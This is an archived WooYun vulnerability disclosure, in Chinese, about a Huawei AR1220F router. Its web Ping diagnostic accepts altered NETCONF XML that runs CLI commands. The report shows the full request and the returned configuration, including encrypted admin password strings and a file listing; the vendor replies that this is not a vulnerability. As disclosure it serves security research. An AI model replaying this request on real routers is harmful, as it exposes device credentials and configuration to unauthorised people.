乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-02: 细节已通知厂商并且等待厂商处理中 2015-06-06: 厂商已经主动忽略漏洞,细节向公众公开
学校来了一批路由器,不会配,然后测试测试了下
有这么个功能系统管理 > 诊断 > Ping
抓包
POST http://192.168.1.119/view/main/config.cgi HTTP/1.1Host: 192.168.1.119Connection: keep-aliveContent-Length: 372Origin: http://192.168.1.119User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/41.0.2272.76 Chrome/41.0.2272.76 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Referer: http://192.168.1.119/view/main/default.html?Version=1.2Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=noSessionID=M1iBvH1s0kak71m1qqL4YFpG7iW5dxin&MessageID=280&<rpc message-id="280" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"><edit-config operation="merge"><target><running/></target><error-option>stop-on-error</error-option><config><featurename istop="true" type="cli"><quit></quit><ping>192.168.1.1</ping></featurename></config></edit-config></rpc>]]>]]>
把<ping>192.168.1.1</ping>改为<display>current-configuration</display>返回内容
HTTP/1.1 200 OKServer: ARDate: tue, 02 jun 2015 10:29:11 GMTContent-Type: text/xmlContent-Length: 1402Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=noConnection: Close<?xml version="1.0"?><rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280"> <ok/></rpc-reply>[V200R005C10SPC500]# drop illegal-mac alarm# wlan ac-global carrier id other ac id 0#pki realm default enrollment self-signed#aaa authentication-scheme default authorization-scheme default accounting-scheme default domain default domain default_admin local-user admin password irreversible-cipher %@%@o~ho0DSI#)c&'+VR0uq2.fN8Hp:0#&|@-6h~GlN!:z~CfN;.%@%@ local-user admin privilege level 3 local-user admin service-type telnet web http#firewall zone Local priority 16#interface Ethernet0/0/0#interface Ethernet0/0/1#interface Ethernet0/0/2#interface Ethernet0/0/3#interface Ethernet0/0/4#interface Ethernet0/0/5#interface Ethernet0/0/6#interface Ethernet0/0/7#interface GigabitEthernet0/0/0#interface GigabitEthernet0/0/1 ip address 192.168.1.119 255.255.255.0#interface Cellular0/0/0#interface Cellular0/0/1#interface NULL0# snmp-agent local-engineid 800007DB0330D17EED3C03# http server enable http secure-server enable#user-interface con 0 authentication-mode password set authentication password cipher %@%@C;@(!jYWE$qrE5"Q`q>7,7x)$I7.F$3jZ'IHQjB"E^|O7x,,%@%@user-interface vty 0 4 authentication-mode aaa#wlan ac#voice # diagnose#return
<dir></dir>HTTP/1.1 200 OKServer: ARDate: tue, 02 jun 2015 10:30:29 GMTContent-Type: text/xmlContent-Length: 917Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=noConnection: Close<?xml version="1.0"?><rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280"> <ok/></rpc-reply>Directory of flash:/ Idx Attr Size(Byte) Date Time(LMT) FileName 0 -rw- 304,700 Mar 27 2015 15:22:32 sacrule.dat 1 -rw- 3,850 Jun 02 2015 07:30:07 mon_file.txt 2 -rw- 111,630,208 Jun 11 2014 03:05:56 AR1220F-V200R005C10SPC500.cc 3 -rw- 0 Mar 27 2015 15:21:58 brdxpon_snmp_cfg.efs 4 -rw- 694 Mar 30 2015 15:25:26 vrpcfg.zip 5 -rw- 396 Mar 30 2015 15:25:26 private-data.txt 6 drw- - Jun 11 2014 12:28:36 dhcp 7 drw- - Jun 11 2014 12:28:38 security 8 -rw- 1,260 Jun 11 2014 12:29:28 rsa_host_key.efs 9 -rw- 540 Jun 11 2014 12:29:32 rsa_server_key.efs510,484 KB total (401,132 KB free)
你们更专业。。
危害等级:无影响厂商忽略
忽略时间:2015-06-06 08:14
感谢白帽子对华为公司安全的关注。经确认,该权限为登录用户默认权限。并非漏洞。
暂无